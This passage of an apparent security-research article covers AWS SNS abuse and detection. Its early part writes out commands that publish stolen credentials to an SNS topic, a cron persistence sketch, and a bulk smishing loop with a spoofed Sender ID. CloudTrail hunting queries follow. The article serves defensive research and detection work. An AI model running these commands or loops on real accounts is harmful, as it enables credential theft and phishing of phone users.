<li>Base64 encode contents: <code>BASE64_CONTENT=$(base64 /tmp/stolen_creds.txt)</code></li>
<li>Publish encoded credentials to our topic: <code>aws sns publish --topic-arn &quot;$TOPIC_ARN&quot; --message &quot;$BASE64_CONTENT&quot; --subject &quot;Encoded Credentials from EC2&quot;</code></li>
</ul>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/aws-sns-abuse/image7.png" alt="" /></p>
<p>Once completed, we can simply check our inbox for these exfiltrated credentials.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/aws-sns-abuse/image1.png" alt="" /></p>
<p>Taking the payload from our message, we can decode it to see that it represents the credentials we found lying around on the EC2 instance.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/aws-sns-abuse/image6.png" alt="" /></p>
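<p>Decoding such a payload locally is a one-liner. The sample string below is illustrative (the Base64 encoding of <code>github_token=ghp_EXAMPLE</code>), not the actual exfiltrated data from the screenshot.</p>

```shell
# Decode a received SNS payload; the sample string is illustrative only.
payload="Z2l0aHViX3Rva2VuPWdocF9FWEFNUExF"
echo "$payload" | base64 -d   # → github_token=ghp_EXAMPLE
```
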
<p>As many adversaries may attempt to establish persistence or laterally move throughout the AWS environment and services, they would then be able to rely on this SNS topic to exfiltrate data for as long as permissions were in scope for the IAM user or role. Additionally, they could set up a recurring job that scans for data on this EC2 instance and continually exfiltrates anything interesting over time. There are many practical options in this scenario for additional chaining that could be done.</p>
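<p>A recurring job of that kind could be as simple as a cron entry. The following is a hypothetical sketch; the script path is illustrative, and the crontab installation line is shown but not executed.</p>

```shell
# Hypothetical persistence sketch: build a cron entry that would re-run a
# scan-and-publish script hourly. The script path is illustrative.
build_exfil_cron_entry() {
  echo "0 * * * * $1 >/dev/null 2>&1"
}
# Installation (not executed here):
#   (crontab -l 2>/dev/null; build_exfil_cron_entry /tmp/.scan.sh) | crontab -
```
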
<p><strong>Before continuing, we encourage you to use the following command to destroy your infrastructure once logging out of the SSH connection</strong>: <code>terraform destroy --auto-approve</code></p>
<h3>Challenges for Adversaries:</h3>
<p>Of course, there are many uncertainties in any whitebox testing that may prove to be roadblocks or hurdles for a threat actor, whether advanced or immature in knowledge, skills, and abilities. Much also depends on the configuration and environment of the potential victim. Below are additional challenges that adversaries would face.</p>
<p><strong>Initial Access</strong>: Gaining initial access to the EC2 instance is often the biggest hurdle. This could involve exploiting a vulnerable web application or 3rd-party service, using stolen SSH credentials, password spraying or credential stuffing, or leveraging other means such as social engineering or phishing. Without initial access, the entire attack chain is infeasible.</p>
<p><strong>Establishing an Active Session</strong>: After gaining access, maintaining an active session can be difficult, especially if the environment includes robust endpoint protection or regular reboots that clear unauthorized activity. Adversaries may need to establish a persistent foothold using techniques like a webshell, reverse shell or an automated dropper script.</p>
<p><strong>AWS CLI Installed on the Instance</strong>: The presence of the AWS CLI on a public-facing EC2 instance is uncommon and not considered a best practice. Many secure environments avoid pre-installing the AWS CLI, forcing adversaries to bring their own tools or rely on less direct methods to interact with AWS services.</p>
<p><strong>IAM Role Permissions</strong>: The IAM role attached to the EC2 instance must include permissive policies for SNS actions (<code>sns:Publish</code>, <code>sns:Subscribe</code>, <code>sns:CreateTopic</code>, <code>sts:GetCallerIdentity</code>). Many environments restrict these permissions to prevent unauthorized use, and misconfigurations are often necessary for the attack to succeed. Best security practices such as principle-of-least-privilege (PoLP) would ensure the roles are set up with only necessary permissions.</p>
<p><strong>Execution of Malicious Scripts</strong>: Successfully executing a script or running commands without triggering alarms (e.g., CloudTrail, GuardDuty, EDR agents) is a challenge. Adversaries must ensure their activities blend into legitimate traffic or use obfuscation techniques to evade detection.</p>
<h3>Advantages for Adversaries</h3>
<p>Of course, while there are challenges for the adversary with these techniques, let’s consider some crucial advantages that they may have as well.</p>
<ul>
<li><strong>Blending In with Native AWS Services</strong>: By leveraging AWS SNS for data exfiltration, the adversary's activity appears as legitimate usage of a native AWS flagship service. SNS is commonly used for notifications and data dissemination, making it less likely to raise immediate suspicion.</li>
<li><strong>Identity Impersonation via IAM Role</strong>: Actions taken via the AWS CLI are attributed to the IAM role attached to the EC2 instance. If the role already has permissions for SNS actions and is used regularly for similar tasks, adversarial activity can blend seamlessly with expected operations.</li>
<li><strong>No Concerns with Security Groups or Network ACLs</strong>: Since SNS communication occurs entirely within the confines of AWS, there’s no reliance on security group or Network ACL configurations. This bypasses traditional outbound traffic controls, ensuring the adversary's data exfiltration attempts are not blocked.</li>
<li><strong>Lack of Detections for SNS Abuse</strong>: Abuse of SNS for data exfiltration is under-monitored in many environments. Security teams may focus on more commonly abused AWS services (e.g., S3 or EC2) and lack dedicated detections or alerts for unusual SNS activity, such as frequent topic creation or large volumes of published messages.</li>
<li><strong>Minimal Footprint with Non-Invasive Commands</strong>: Local commands used by the adversary (e.g., <code>cat</code>, <code>echo</code>, <code>base64</code>) are benign and typically do not trigger endpoint detection and response (EDR) tools. These commands are common in legitimate administrative tasks, allowing adversaries to avoid detection on backend Linux systems.</li>
<li><strong>Efficient and Scalable Exfiltration</strong>: SNS enables scalable exfiltration by allowing adversaries to send large amounts of data to multiple subscribers. Once set up, the adversary can automate periodic publishing of sensitive information with minimal additional effort.</li>
<li><strong>Persistent Exfiltration Capabilities</strong>: As long as the SNS topic and subscription remain active, the adversary can use the infrastructure for ongoing exfiltration. This is especially true if the IAM role retains its permissions and no proactive monitoring is implemented.</li>
<li><strong>Bypassing Egress Monitoring and DLP</strong>: Since the data is exfiltrated through SNS within the AWS environment, it bypasses traditional egress monitoring or data loss prevention solutions that focus on outbound traffic to external destinations.</li>
</ul>
<h1>In-the-Wild Abuse</h1>
<p>While whitebox scenarios are invaluable for simulating potential adversarial behaviors, it is equally important to ground these simulations with in-the-wild (ItW) threats. To this end, we explored publicly available research and identified a <a href="https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/">key article</a> from SentinelOne describing a spam messaging campaign that leveraged AWS SNS. Using insights from this research, we attempted to replicate these techniques in a controlled environment to better understand their implications.</p>
<p>Although we will not delve into the attribution analysis outlined in SentinelOne’s research, we highly recommend reviewing their work for a deeper dive into the campaign’s origins. Instead, our focus is on the tools and techniques employed by the adversary to abuse AWS SNS for malicious purposes.</p>
<h2>Smishing and Phishing</h2>
<p>Compromised AWS environments with pre-configured SNS services can serve as launchpads for smishing (SMS phishing) or phishing attacks. Adversaries may exploit legitimate SNS topics and subscribers to distribute fraudulent messages internally or externally, leveraging the inherent trust in an organization’s communication channels.</p>
<p>As detailed in SentinelOne’s <a href="https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/">blog</a>, the adversary employed a Python-based tool known as <strong>SNS Sender</strong>. This script enabled bulk SMS phishing campaigns by interacting directly with AWS SNS APIs using compromised AWS credentials. These authenticated API requests allowed the adversary to bypass common safeguards and send phishing messages en masse.</p>
<p>The <a href="https://www.virustotal.com/gui/file/6d8c062c23cb58327ae6fc3bbb66195b1337c360fa5008410f65887c463c3428"><strong>SNS Sender script</strong></a> leverages valid AWS access keys and secrets to establish authenticated API sessions via the AWS SDK. Armed with these credentials, adversaries can craft phishing workflows that include:</p>
<ol>
<li>Establishing authenticated SNS API sessions via the AWS SDK.</li>
<li>Enumerating and targeting lists of phone numbers to serve as phishing recipients.</li>
<li>Utilizing a pre-registered Sender ID (if available) for spoofing trusted entities.</li>
<li>Sending SMS messages containing malicious links, often impersonating a legitimate service.</li>
</ol>
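<p>In CLI terms, the bulk-SMS loop described above might look like the following sketch. The recipient numbers, Sender ID, and message text are hypothetical, and <code>send_smish</code> assumes valid AWS credentials on a production (non-sandbox) SNS account.</p>

```shell
# Rough sketch of an SNS Sender-style SMS loop; all values are hypothetical.
is_e164() {
  # Rough E.164 sanity check: '+' followed by at least 8 digits
  case "$1" in
    +[0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9]*) return 0 ;;
    *) return 1 ;;
  esac
}

send_smish() {
  is_e164 "$1" || return 1
  aws sns publish --phone-number "$1" \
    --message "Your package is on hold. Verify at hxxps://example-phish.invalid" \
    --message-attributes \
    '{"AWS.SNS.SMS.SenderID":{"DataType":"String","StringValue":"DELIVERY"}}'
}

# Usage (not executed here): iterate a target list of phone numbers
# while read -r number; do send_smish "$number"; done < targets.txt
```
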
<p><img src="https://www.elastic.co/es/security-labs/assets/images/aws-sns-abuse/image4.png" alt="" /></p>
<p>Elastic Security Labs predicts that the use of one-off or commercially available tools for abusing cloud services, like SNS Sender, will continue to grow as a research focus. This underscores the importance of understanding these tools and their impact on cloud security.</p>
<h3>Weaponization and Pre-Testing Considerations</h3>
<p>To successfully execute a phishing campaign at scale using AWS SNS, the adversary would have needed access to an already registered AWS End User Messaging organization. AWS restricts new accounts to SNS Sandbox Mode, which limits SMS sending to manually verified phone numbers. To bypass sandbox restrictions, adversaries would need access to an account already approved for production SMS messaging. The process of testing and weaponization would have required several key steps.</p>
<p>A fully configured AWS End User Messaging setup would require:</p>
<ul>
<li>An established origination identity (which includes a long code, toll-free number, or short code).</li>
<li>Regulatory approval through a brand registration process.</li>
<li>Carrier pre-approval for high-volume SMS messaging.</li>
</ul>
<p>Without these pre-registered identifiers, AWS SNS messages may be deprioritized, blocked, or fail to send.</p>
<p>Before deploying a large-scale attack, adversaries would likely test SMS delivery using verified phone numbers within AWS SNS Sandbox Mode. This process requires:</p>
<ul>
<li>Manually verifying phone numbers before sending messages.</li>
<li>Ensuring their carrier allows AWS SNS sandbox messages, as some (like T-Mobile and Google Voice) frequently block AWS SNS sandbox verification SMS.</li>
<li>Testing delivery routes across different AWS regions to identify which countries permit custom Sender IDs or allow non-sandbox messages.</li>
</ul>
<p>If an attacker’s test environment failed to receive SNS verification OTPs, they would likely pivot to a different AWS account or leverage a compromised AWS account that already had production-level messaging permissions.</p>
<p>In addition to this, the adversary would likely prioritize transactional messages over promotional ones. Transactional messages (OTPs, security alerts, etc.) are prioritized by AWS, whereas promotional messages are lower priority and may be filtered or blocked by certain carriers.</p>
<p>If adversaries cannot override message type defaults, their phishing messages may be deprioritized or rejected by AWS, which could be a hurdle.</p>
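<p>The message type is controlled with the <code>AWS.SNS.SMS.SMSType</code> message attribute, a real SNS attribute. The helper below builds that attribute JSON; the phone number and publish call in the comment are illustrative and not executed.</p>

```shell
# Build the message attribute that marks an SMS as transactional or promotional.
sms_type_attrs() {
  printf '{"AWS.SNS.SMS.SMSType":{"DataType":"String","StringValue":"%s"}}' "$1"
}
# Illustrative usage (not executed here):
# aws sns publish --phone-number "+15555550100" --message "Your code is 123456" \
#   --message-attributes "$(sms_type_attrs Transactional)"
```
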
<p><strong>Registered Origination Identity &amp; Sender ID (If Supported)</strong></p>
<p>AWS requires brand registration and origination identity verification for businesses sending high-volume SMS messages. Depending on the region and carrier, adversaries may be able to exploit different configurations:</p>
<ul>
<li><strong>Sender ID Abuse</strong>: In some non-U.S. regions, adversaries could register a Sender ID to make phishing messages appear from a trusted entity. This may allow for spoofing banks, shipping companies, or government agencies, making the phishing attempt more convincing.</li>
<li><strong>Long Code &amp; Toll-Free Exploitation</strong>: AWS SNS assigns long codes (standard phone numbers) or toll-free numbers for outbound SMS. Toll-free numbers require registration but could still be abused if an adversary compromises an AWS account with an active toll-free messaging service.</li>
<li><strong>Short Code Restrictions</strong>: High-throughput short codes (5- or 6-digit numbers) are often carrier-controlled and require additional vetting, making them less practical for adversaries.</li>
</ul>
<h3><strong>Infrastructure Setup</strong></h3>
<p>By default, AWS accounts that have not properly configured the <a href="https://docs.aws.amazon.com/sms-voice/latest/userguide/what-is-sms-mms.html">End User Messaging</a> service are restricted to an <a href="https://aws.amazon.com/blogs/compute/introducing-the-sms-sandbox-for-amazon-sns/"><strong>SMS sandbox</strong></a>. This sandbox allows developers to test SMS functionality by sending messages to verified phone numbers. However, as we discovered, the process of verifying numbers in the sandbox is fraught with challenges.</p>
<p>Despite repeated attempts to register phone numbers with the sandbox, we found that verification messages (OTP codes) failed to arrive at endpoints across various carriers and services, including Google Voice and Twilio. This suggests that mobile carriers may block these sandbox-originated messages, effectively stalling the verification process and ultimately blocking us from emulating the behavior.</p>
<p>For production use, <a href="https://docs.aws.amazon.com/sns/latest/dg/sns-sms-sandbox-moving-to-production.html">migrating</a> from the sandbox requires a fully configured AWS End User Messaging service. This includes:</p>
<ul>
<li>A legitimate Sender ID.</li>
<li>A phone pool for failovers.</li>
<li>Origination identity.</li>
<li>Brand registration for regulatory compliance.</li>
</ul>
<p>This setup aligns with the requirements of the SNS Sender script and represents an ideal environment for adversaries. The use of a Sender ID, which relies on a pre-established <a href="https://docs.aws.amazon.com/sns/latest/dg/channels-sms-originating-identities.html">origination identity</a> and brand registration, allows phishing messages to appear as though they originate from a reputable organization. This reduces the likelihood of detection or carrier-level blocking, increasing the success rate of the campaign.</p>
<p>The requirements for this attack suggest adversaries are likely to target companies that use AWS End User Messaging for automated SMS alerts and messaging. Industries such as logistics and delivery services, e-commerce platforms, and travel and hospitality are prime targets due to their reliance on automated SMS notifications.</p>
<p>On the recipient's side, the phishing message appears as if it originates from a trusted entity, bypassing carrier alarms and evading suspicion.</p>
<p>During our testing, we encountered unexpected behavior with logging in CloudTrail when attempting to use the script and AWS CLI to send SMS messages directly through SNS. Failed message delivery attempts did not appear in CloudTrail logs as expected.</p>
<p>Although the <a href="https://docs.aws.amazon.com/sns/latest/api/API_Publish.html"><strong>Publish</strong></a> API call is generally logged in CloudTrail (provided data plane events are enabled), it remains unclear if the absence of logs for failed attempts was due to inherent SNS behavior or misconfiguration on our part. This gap highlights the need for deeper investigation into how failed SNS Publish requests are handled by AWS and whether additional configurations are required to capture these events reliably.</p>
<p>As a result, we determined it would be best to include a threat hunting query for this rather than a detection rule due to the inability to fully replicate the adversary behavior, reliance on pre-established and registered brands and origination identity, in full.</p>
<h1>Detection and Hunting Opportunities</h1>
<p>For detection and hunting, CloudTrail audit logs provide enough visibility into the subsequent API calls from this activity. They also include enough contextual information to help raise the fidelity of these anomalous signals. The following detections and hunting queries leverage CloudTrail data ingested into our Elastic Stack with the AWS CloudTrail integration; however, they should be translatable to the SIEM of your choice if needed. For this activity, we focus solely on assumed roles, specifically those of abused EC2 instances, but this could take place elsewhere in AWS environments.</p>
<h2>SNS Topic Created by Rare User</h2>
<p><a href="https://github.com/elastic/detection-rules/blob/c5523c4d4060555e143b2d46fea1748173352b8f/rules/integrations/aws/resource_development_sns_topic_created_by_rare_user.toml">Detection Rule Source</a><br />
<a href="https://github.com/elastic/detection-rules/blob/7fb13f8d5649cbcf225d2ade964bdfef15ab6b11/hunting/aws/docs/sns_topic_created_by_rare_user.md">Hunting Query Source</a><br />
MITRE ATT&amp;CK: <a href="https://attack.mitre.org/techniques/T1608/">T1608</a></p>
<p>Identifies when an SNS topic is created by a rare AWS user identity ARN (IAM User or Role). This detection leverages Elastic’s New Terms type rules to identify the first occurrence of a user identity ARN creating an SNS topic. It would be highly unusual for an assumed role, typically leveraged by EC2 instances, to be creating SNS topics.</p>
<p>Our query leverages KQL and <a href="https://www.elastic.co/es/guide/en/security/current/rules-ui-create.html#create-new-terms-rule">New Terms rule type</a> to focus on topics created by an Assumed Role specifically for an EC2 instance.</p>
<pre><code>event.dataset: &quot;aws.cloudtrail&quot;
    and event.provider: &quot;sns.amazonaws.com&quot;
    and event.action: &quot;CreateTopic&quot;
    and aws.cloudtrail.user_identity.type: &quot;AssumedRole&quot;
    and aws.cloudtrail.user_identity.arn: *i-*
</code></pre>
<h3>Hunting Query (ES|QL)</h3>
<p>Our hunting query focuses on the CreateTopic API action from an entity whose identity type is an assumed role. We also parse the ARN to ensure that it is an EC2 instance this request is sourcing from. We can then aggregate on cloud account, entity (EC2 instance ID), assumed role name, region and user agent. If it is unusual for the EC2 instance reported to be creating SNS topics randomly, then it may be a good anomalous signal to investigate.</p>
<pre><code>from logs-aws.cloudtrail-*
| where @timestamp &gt; now() - 7 day
| WHERE
    event.dataset == &quot;aws.cloudtrail&quot; AND
    event.provider == &quot;sns.amazonaws.com&quot; AND
    event.action == &quot;CreateTopic&quot;
    and aws.cloudtrail.user_identity.type == &quot;AssumedRole&quot;
| DISSECT aws.cloudtrail.user_identity.arn &quot;%{?}:assumed-role/%{assumed_role_name}/%{entity}&quot;
| DISSECT user_agent.original &quot;%{user_agent_name} %{?user_agent_remainder}&quot;
| WHERE STARTS_WITH(entity, &quot;i-&quot;)
| STATS regional_topic_creation_count = COUNT(*) by cloud.account.id, entity, assumed_role_name, cloud.region, user_agent_name
| SORT regional_topic_creation_count ASC
</code></pre>
<p>Hunting Notes:</p>
<ul>
<li>It is unusual already for credentials from an assumed role for an EC2 instance to be creating SNS topics randomly.</li>
<li>If a user identity access key (aws.cloudtrail.user_identity.access_key_id) exists in the CloudTrail audit log, then this request was accomplished via the CLI or programmatically. These keys could be compromised and warrant further investigation.</li>
<li>Analysts can pivot into Publish API actions called against this specific topic to identify which AWS resources are publishing messages. With access to the topic, they can then investigate the subscriber list to identify unauthorized subscribers.</li>
</ul>
<h2>SNS Topic Subscription with Email by Rare User</h2>
<p><a href="https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/exfiltration_sns_email_subscription_by_rare_user.toml">Detection Rule Source</a><br />
<a href="https://github.com/elastic/detection-rules/blob/7fb13f8d5649cbcf225d2ade964bdfef15ab6b11/hunting/aws/docs/sns_email_subscription_by_rare_user.md">Hunting Query Source</a><br />
MITRE ATT&amp;CK: <a href="https://attack.mitre.org/techniques/T1567/">T1567</a>, <a href="https://attack.mitre.org/techniques/T1530/">T1530</a></p>
<p>Identifies when an SNS topic is subscribed to by a rare AWS user identity ARN (IAM User or Role). This detection leverages Elastic’s <strong>New Terms</strong> type rules to identify when the first occurrence of a user identity ARN attempts to subscribe to an existing SNS topic. The data exfiltration that took place during our whitebox testing example above would have been caught by this detection; an alert would have been generated when we established an SNS subscription to an external user.</p>
<p>Further false-positive reductions could be obtained by whitelisting expected organization TLDs in the requested email address if the topic is meant for internal use only.</p>
<p>Our query leverages KQL and the New Terms rule type to focus on subscriptions that specify an email address. Unfortunately, CloudTrail redacts the subscribed email address, which would otherwise be vital for investigation.</p>
<pre><code>event.dataset: &quot;aws.cloudtrail&quot;
    and event.provider: &quot;sns.amazonaws.com&quot;
    and event.action: &quot;Subscribe&quot;
    and aws.cloudtrail.request_parameters: *protocol=email*
</code></pre>
<p><strong>New Terms value</strong>: aws.cloudtrail.user_identity.arn</p>
<h3>Hunting Query (ES|QL)</h3>
<p>Our hunting query leverages ES|QL but parses the Subscribe API action parameters to filter further on the email protocol being specified. It also parses out the name of the user-agent, but relies further on aggregations to potentially identify other anomalous user-agent attributes. We've also included the region where the subscription occurred, as it may be uncommon for certain regions to be subscribed to others, depending on the specific business context of an organization.</p>
<pre><code>from logs-aws.cloudtrail-*
| where @timestamp &gt; now() - 7 day
| WHERE
    event.dataset == &quot;aws.cloudtrail&quot; AND
    event.provider == &quot;sns.amazonaws.com&quot; AND
    event.action == &quot;Subscribe&quot;
| DISSECT aws.cloudtrail.request_parameters &quot;{%{?protocol_key}=%{protocol}, %{?endpoint_key}=%{redacted}, %{?return_arn}=%{return_bool}, %{?topic_arn_key}=%{topic_arn}}&quot;
| DISSECT user_agent.original &quot;%{user_agent_name} %{?user_agent_remainder}&quot;
| WHERE protocol == &quot;email&quot;
| STATS regional_topic_subscription_count = COUNT(*) by aws.cloudtrail.user_identity.arn, cloud.region, source.address, user_agent_name
| WHERE regional_topic_subscription_count == 1
| SORT regional_topic_subscription_count ASC
</code></pre>
<p>Hunting Notes:</p>
<ul>
<li>If a user identity access key (aws.cloudtrail.user_identity.access_key_id) exists in the CloudTrail audit log, then this request was accomplished via the CLI or programmatically. These keys could be compromised and warrant further investigation.</li>
<li>Ignoring the topic ARN during aggregation is important to identify first occurrence anomalies of subscribing to SNS topic with an email. By not grouping subscriptions by topic ARN, we ensure that the query focuses on detecting unexpected or infrequent subscriptions only, regardless of specific topics already established.</li>
<li>Another query may be required with the user identity ARN as an inclusion filter to identify which topic they subscribed to.</li>
<li>If an anomalous user-agent name is observed, a secondary investigation into the user-agent string may be required to determine whether it is associated with automated scripts, uncommon browsers, or mismatched platforms. While user agents are simple to spoof, adversaries have often been observed leaving them unchanged.</li>
</ul>
<h2>SNS Topic Message Published by Rare User</h2>
<p><a href="https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/lateral_movement_sns_topic_message_publish_by_rare_user.toml">Detection Rule Source</a><br />
<a href="https://github.com/elastic/detection-rules/blob/7fb13f8d5649cbcf225d2ade964bdfef15ab6b11/hunting/aws/docs/sns_topic_message_published_by_rare_user.md">Hunting Query Source</a></p>
<p>Identifies when a message is published to an SNS topic from an unusual user identity ARN in AWS. If a role or permission policy does not follow the principle of least privilege (PoLP), publishing to SNS topics may be allowed and thus abused. For example, default roles supplied via the AWS Marketplace may allow publishing to SNS topics. The rule may also identify entities that once legitimately published to SNS topics and whose now-compromised credentials are being abused. Note that this rule focuses solely on EC2 instances, but you could adjust it to account for different publish anomalies based on source, region, user agent, and more.</p>
<p>Our query leverages KQL and the New Terms rule type to flag the first occurrence of a given assumed-role entity publishing a message to an SNS topic.</p>
<pre><code>event.dataset: &quot;aws.cloudtrail&quot;
    and event.provider: &quot;sns.amazonaws.com&quot;
    and event.action: &quot;Publish&quot;
    and aws.cloudtrail.user_identity.type: &quot;AssumedRole&quot;
    and aws.cloudtrail.user_identity.arn: *i-*
</code></pre>
<p><strong>New Terms value</strong>: aws.cloudtrail.user_identity.arn</p>
<h3>Hunting Query (ES|QL)</h3>
<p>Our hunting query leverages ES|QL and also focuses on SNS logs where the API action is <em>Publish</em>. It only triggers if the user identity type is an assumed role and the user identity ARN is an EC2 instance ID. Aggregating on <strong>account ID</strong>, <strong>entity</strong>, <strong>assumed role</strong>, <strong>SNS topic</strong>, and <strong>region</strong> helps us identify further anomalies based on how expected this activity is. We can also leverage the user agent to identify these calls being made by unusual tools or software.</p>
<pre><code>from logs-aws.cloudtrail-*
| where @timestamp &gt; now() - 7 day
| WHERE
    event.dataset == &quot;aws.cloudtrail&quot; AND
    event.provider == &quot;sns.amazonaws.com&quot; AND
    event.action == &quot;Publish&quot;
    and aws.cloudtrail.user_identity.type == &quot;AssumedRole&quot;
| DISSECT aws.cloudtrail.request_parameters &quot;{%{?message_key}=%{message}, %{?topic_key}=%{topic_arn}}&quot;
| DISSECT aws.cloudtrail.user_identity.arn &quot;%{?}:assumed-role/%{assumed_role_name}/%{entity}&quot;
| DISSECT user_agent.original &quot;%{user_agent_name} %{?user_agent_remainder}&quot;
| WHERE STARTS_WITH(entity, &quot;i-&quot;)
| STATS regional_topic_publish_count = COUNT(*) by cloud.account.id, entity, assumed_role_name, topic_arn, cloud.region, user_agent_name
| SORT regional_topic_publish_count ASC
</code></pre>
<p>Hunting Notes:</p>
<ul>
<li>If a user identity access key (aws.cloudtrail.user_identity.access_key_id) exists in the CloudTrail audit log, then this request was accomplished via the CLI or programmatically. These keys could be compromised and warrant further investigation.</li>
<li>If you notice user agents such as Terraform or Pulumi, the activity may be related to infrastructure-as-code deployments, testing environments, or maintenance.</li>
<li>Python SDKs other than the official AWS SDK (Boto3) may indicate custom tooling or scripts being leveraged.</li>
</ul>
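<p>The ARN dissection in the query above can be sketched in Python. The ARN below is a fabricated example of a CloudTrail assumed-role session ARN, not a real identity:</p>

```python
# Fabricated assumed-role session ARN as it would appear in CloudTrail; this
# mirrors the DISSECT + STARTS_WITH logic in the ES|QL hunt above.
arn = "arn:aws:sts::123456789012:assumed-role/ec2-sns-role/i-0abc1234def567890"

def split_assumed_role_arn(arn: str):
    """Return (assumed_role_name, entity), or None for non-assumed-role ARNs."""
    prefix, sep, remainder = arn.partition(":assumed-role/")
    if not sep:
        return None
    role_name, _, entity = remainder.partition("/")
    return role_name, entity

role, entity = split_assumed_role_arn(arn)
is_ec2_session = entity.startswith("i-")  # the hunt keeps only EC2 instance sessions
print(role, entity, is_ec2_session)
```

<p>Sessions whose entity name starts with <code>i-</code> correspond to EC2 instances that assumed the role, which is exactly the population the hunt aggregates over.</p>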
<h2>SNS Direct-to-Phone Messaging Spike</h2>
<p><a href="https://github.com/elastic/detection-rules/blob/7fb13f8d5649cbcf225d2ade964bdfef15ab6b11/hunting/aws/docs/sns_direct_to_phone_messaging_spike.md">Hunting Query Source</a><br />
MITRE ATT&amp;CK: <a href="https://attack.mitre.org/techniques/T1660/">T1660</a></p>
<p>Our hunting efforts for hypothesized SNS compromise—where an adversary is conducting phishing (smishing) campaigns—focus on <em>Publish</em> API actions in AWS SNS. Specifically, we track instances where <em>phoneNumber</em> is present in request parameters, signaling that messages are being sent directly to phone numbers rather than through an SNS topic.</p>
<p>Notably, instead of relying on SNS topics with pre-subscribed numbers, the adversary exploits an organization’s production Endpoint Messaging permissions, leveraging:</p>
<ul>
<li>An approved Origination ID (if the organization has registered one).</li>
<li>A Sender ID (if the adversary controls one or can spoof a trusted identifier).</li>
<li>AWS long codes or short codes (which may be dynamically assigned).</li>
</ul>
<p>Since AWS SNS sanitizes logs, phone numbers are not visible in CloudTrail, but deeper analysis in CloudWatch or third-party monitoring tools may help.</p>
<h3>Hunting Query (ES|QL)</h3>
<p>This query detects a spike in direct SNS messages, which may indicate smishing campaigns from compromised AWS accounts.</p>
<pre><code>from logs-aws.cloudtrail-*
| WHERE @timestamp &gt; now() - 7 day
| EVAL target_time_window = DATE_TRUNC(10 seconds, @timestamp)
| WHERE
    event.dataset == &quot;aws.cloudtrail&quot; AND
    event.provider == &quot;sns.amazonaws.com&quot; AND
    event.action == &quot;Publish&quot; AND
    event.outcome == &quot;success&quot; AND
    aws.cloudtrail.request_parameters LIKE &quot;*phoneNumber*&quot;
| DISSECT user_agent.original &quot;%{user_agent_name} %{?user_agent_remainder}&quot;
| STATS sms_message_count = COUNT(*) by target_time_window, cloud.account.id, aws.cloudtrail.user_identity.arn, cloud.region, source.address, user_agent_name
| WHERE sms_message_count &gt; 30
</code></pre>
<p>Hunting Notes:</p>
<ul>
<li>AWS removes phone numbers in logs, so deeper analysis via CloudWatch logs may be necessary.</li>
<li>While investigating in CloudWatch, the message context is also sanitized. It would be ideal to investigate the message for any suspicious URL links being embedded in the text messages.</li>
<li>You can also review AWS SNS delivery logs (if enabled) for message metadata.</li>
<li>If messages are not using a topic-based subscription, it suggests direct targeting.</li>
<li>The source of these requests is important: direct publishing from an EC2 instance is rather odd, whereas Lambda may be an expected serverless source.</li>
</ul>
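<p>The windowing and threshold logic of this hunt can be illustrated with plain Python over synthetic timestamps. The 10-second window and the 30-message threshold mirror the query; the event timings themselves are invented for the sake of the example:</p>

```python
from collections import Counter
from datetime import datetime, timedelta, timezone

# Synthetic Publish events: a burst of 40 direct-to-phone messages within a few
# seconds, plus low-rate background noise spread over several minutes.
start = datetime(2025, 1, 1, 12, 0, 0, tzinfo=timezone.utc)
events = [start + timedelta(milliseconds=150 * i) for i in range(40)]  # burst
events += [start + timedelta(minutes=m) for m in range(1, 6)]          # noise

def truncate_10s(ts: datetime) -> datetime:
    """Equivalent of DATE_TRUNC(10 seconds, @timestamp)."""
    return ts.replace(second=ts.second - ts.second % 10, microsecond=0)

# Count messages per 10-second window and keep only windows over the threshold,
# just as the STATS ... | WHERE sms_message_count > 30 pipeline does.
counts = Counter(truncate_10s(ts) for ts in events)
spikes = {window: n for window, n in counts.items() if n > 30}
print(spikes)
```

<p>Only the burst window survives the filter; the background noise never crosses the threshold, which is the behavior the ES|QL hunt relies on.</p>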
<h1>Takeaways</h1>
<p>Thank you for taking the time to read this publication on <strong>AWS SNS Abuse: Data Exfiltration and Phishing</strong>. We hope this research provides valuable insights into how adversaries can leverage AWS SNS for data exfiltration, smishing and phishing campaigns, as well as practical detection and hunting strategies to counter these threats.</p>
<p><strong>Key Takeaways:</strong></p>
<ul>
<li>AWS SNS is a powerful service, but can be misused for malicious purposes, including phishing (smishing) and data exfiltration.</li>
<li>Adversaries may abuse production SNS permissions using pre-approved Sender IDs, Origination IDs, or long/short codes to send messages outside an organization.</li>
<li>Threat actors may weaponize misconfigurations in IAM policies, CloudTrail logging gaps and SNS API limitations to fly under the radar.</li>
<li>While in-the-wild (ItW) abuse of SNS is not frequently reported, we are confident that its weaponization and targeted exploitation are already occurring or will emerge eventually.</li>
<li>AWS CloudTrail does not capture phone numbers or message contents in SNS logs, making CloudWatch or third-party monitoring essential for deeper analysis.</li>
<li>Threat hunting queries can help detect SNS topics being created, subscribed to, or receiving a spike in direct messages, signaling potential abuse.</li>
<li>Detection strategies include monitoring SNS API actions, identifying unusual SNS message spikes and flagging anomalies from EC2 or Lambda sources.</li>
<li>Defensive measures should include IAM policy hardening, CloudTrail &amp; SNS logging, anomaly-based detections and security best practices as recommended by AWS to reduce attack surface.</li>
</ul>
<p>AWS SNS is often overlooked in security discussions, but as this research shows, it presents a viable attack vector for adversaries if left unmonitored. We encourage defenders to stay proactive, refine detection logic, and implement robust security controls to mitigate these risks and increase security posture.</p>
<p>Thanks for reading and happy hunting!</p>
<h1>References</h1>
<ul>
<li><a href="https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/">https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/</a></li>
<li><a href="https://permiso.io/blog/s/smishing-attack-on-aws-sms-new-phone-who-dis/">https://permiso.io/blog/s/smishing-attack-on-aws-sms-new-phone-who-dis/</a></li>
<li><a href="https://catalog.workshops.aws/build-sms-program/en-US">https://catalog.workshops.aws/build-sms-program/en-US</a></li>
</ul>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/es/security-labs/assets/images/aws-sns-abuse/Security Labs Images 7.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
